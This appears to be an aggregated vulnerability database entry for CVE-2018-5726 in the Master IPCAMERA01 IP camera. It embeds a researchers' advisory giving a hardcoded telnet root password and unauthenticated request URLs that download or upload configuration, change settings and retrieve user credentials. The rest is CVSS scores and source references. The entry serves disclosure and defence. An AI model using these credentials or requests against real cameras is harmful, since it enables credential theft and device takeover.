Sign-up

ID

VAR-201801-1649


CVE

CVE-2018-5726


TITLE

MASTER IPCAMERA01 Information disclosure vulnerability in devices

Trust: 0.8

sources: JVNDB: JVNDB-2018-001499

DESCRIPTION

MASTER IPCAMERA01 3.3.4.2103 devices allow remote attackers to obtain sensitive information via a crafted HTTP request, as demonstrated by the username, password, and configuration settings. MASTER IPCAMERA01 The device contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MASTERIPCAMERA01 is an IP network camera product. An information disclosure vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities # Date: 17-01-2018 # Remote: Yes # Exploit Authors: Daniele Linguaglossa, Raffaele Sabato # Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 # Vendor: Master IP CAM # Version: 3.3.4.2103 # CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726 I DESCRIPTION ======================================================================== The Master IP CAM 01 suffers of multiple vulnerabilities: # [CVE-2018-5723] Hardcoded Password for Root Account # [CVE-2018-5724] Unauthenticated Configuration Download and Upload # [CVE-2018-5725] Unauthenticated Configuration Change # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure II PROOF OF CONCEPT ======================================================================== ## [CVE-2018-5723] Hardcoded Password for Root Account Is possible to access telnet with the hardcoded credential root:cat1029 ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi Upload Form: ### Unauthenticated Configuration Upload <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form> ## [CVE-2018-5725] Unauthenticated Configuration Change Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080 List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser III REFERENCES ======================================================================== http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

Trust: 2.43

sources: NVD: CVE-2018-5726 // JVNDB: JVNDB-2018-001499 // CNVD: CNVD-2018-02194 // VULHUB: VHN-135758 // VULMON: CVE-2018-5726 // PACKETSTORM: 145935

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-02194

AFFECTED PRODUCTS

vendor:barnimodel:master ip camera01scope:eqversion:3.3.4.2103

Trust: 1.6

vendor:barni carlomodel:master ipcamera01scope:eqversion:3.3.4.2103

Trust: 0.8

vendor:mastermodel:ipcamera01scope:eqversion:3.3.4.2103

Trust: 0.6

sources: CNVD: CNVD-2018-02194 // JVNDB: JVNDB-2018-001499 // CNNVD: CNNVD-201801-569 // NVD: CVE-2018-5726

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-5726
value: CRITICAL

Trust: 1.0

NVD: CVE-2018-5726
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-02194
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201801-569
value: MEDIUM

Trust: 0.6

VULHUB: VHN-135758
value: MEDIUM

Trust: 0.1

VULMON: CVE-2018-5726
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-5726
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-02194
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-135758
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-5726
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-02194 // VULHUB: VHN-135758 // VULMON: CVE-2018-5726 // JVNDB: JVNDB-2018-001499 // CNNVD: CNNVD-201801-569 // NVD: CVE-2018-5726

PROBLEMTYPE DATA

problemtype:CWE-200

Trust: 1.9

sources: VULHUB: VHN-135758 // JVNDB: JVNDB-2018-001499 // NVD: CVE-2018-5726

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201801-569

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201801-569

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2018-001499

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-135758 // 
            
            
            
            VULMON: CVE-2018-5726

PATCH
title:Top Pageurl:http://www.barni.it/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2018-001499

EXTERNAL IDS
db:NVDid:CVE-2018-5726
Trust: 3.3
db:PACKETSTORMid:145935
Trust: 1.3
db:EXPLOIT-DBid:43693
Trust: 1.2
db:JVNDBid:JVNDB-2018-001499
Trust: 0.8
db:CNNVDid:CNNVD-201801-569
Trust: 0.7
db:CNVDid:CNVD-2018-02194
Trust: 0.6
db:VULHUBid:VHN-135758
Trust: 0.1
db:VULMONid:CVE-2018-5726
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-02194 // 
            
            
            
            VULHUB: VHN-135758 // 
            
            
            
            VULMON: CVE-2018-5726 // 
            
            
            
            JVNDB: JVNDB-2018-001499 // 
            
            
            
            PACKETSTORM: 145935 // 
            
            
            
            CNNVD: CNNVD-201801-569 // 
            
            
            
            NVD: CVE-2018-5726

REFERENCES
url:http://syrion.me/blog/master-ipcam/
Trust: 3.3
url:https://www.exploit-db.com/exploits/43693/
Trust: 1.3
url:https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html
Trust: 1.2
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726
Trust: 0.9
url:https://nvd.nist.gov/vuln/detail/cve-2018-5726
Trust: 0.9
url:https://cwe.mitre.org/data/definitions/200.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Trust: 0.1
url:https://twitter.com/syrion89
Trust: 0.1
url:http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5725
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5724
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5723
Trust: 0.1
url:https://twitter.com/dzonerzy,
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-02194 // 
            
            
            
            VULHUB: VHN-135758 // 
            
            
            
            VULMON: CVE-2018-5726 // 
            
            
            
            JVNDB: JVNDB-2018-001499 // 
            
            
            
            PACKETSTORM: 145935 // 
            
            
            
            CNNVD: CNNVD-201801-569 // 
            
            
            
            NVD: CVE-2018-5726

CREDITS
Daniele Linguaglossa, Raffaele Sabato
Trust: 0.1
sources:
            
            
            PACKETSTORM: 145935

SOURCES
db:CNVDid:CNVD-2018-02194
db:VULHUBid:VHN-135758
db:VULMONid:CVE-2018-5726
db:JVNDBid:JVNDB-2018-001499
db:PACKETSTORMid:145935
db:CNNVDid:CNNVD-201801-569
db:NVDid:CVE-2018-5726

LAST UPDATE DATE
2024-11-23T21:53:28.227000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2018-02194date:2018-01-30T00:00:00
db:VULHUBid:VHN-135758date:2018-02-05T00:00:00
db:VULMONid:CVE-2018-5726date:2018-02-05T00:00:00
db:JVNDBid:JVNDB-2018-001499date:2018-02-21T00:00:00
db:CNNVDid:CNNVD-201801-569date:2018-01-17T00:00:00
db:NVDid:CVE-2018-5726date:2024-11-21T04:09:15.433

SOURCES RELEASE DATE
db:CNVDid:CNVD-2018-02194date:2018-01-30T00:00:00
db:VULHUBid:VHN-135758date:2018-01-16T00:00:00
db:VULMONid:CVE-2018-5726date:2018-01-16T00:00:00
db:JVNDBid:JVNDB-2018-001499date:2018-02-21T00:00:00
db:PACKETSTORMid:145935date:2018-01-17T03:33:33
db:CNNVDid:CNNVD-201801-569date:2018-01-17T00:00:00
db:NVDid:CVE-2018-5726date:2018-01-16T22:29:00.443